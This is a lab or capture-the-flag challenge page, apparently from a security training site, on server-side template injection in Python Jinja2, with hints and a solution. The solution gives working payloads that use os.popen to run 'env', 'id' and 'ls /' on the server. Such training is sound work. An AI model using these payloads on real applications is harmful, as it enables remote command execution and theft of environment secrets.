Jinja2

Basic server side template injection (SSTI) - Python Jinja2

by Brumens
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

Basic server side template injection (SSTI) - Python Jinja2

Use the knowledge from the training module jinja2 to read the flag located in the system enviroment.

Hints

Hint #1
expand_more

Remember. If you find the __import__ exception, it is likely that you can import a Python library that you need to run system commands!

Hint #2
expand_more

system enviroment variables can be accessed with the system command env

Solution

Read the solution
expand_more

Payload :

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('env').read() }}

Other system commands :

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls /').read() }}
drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result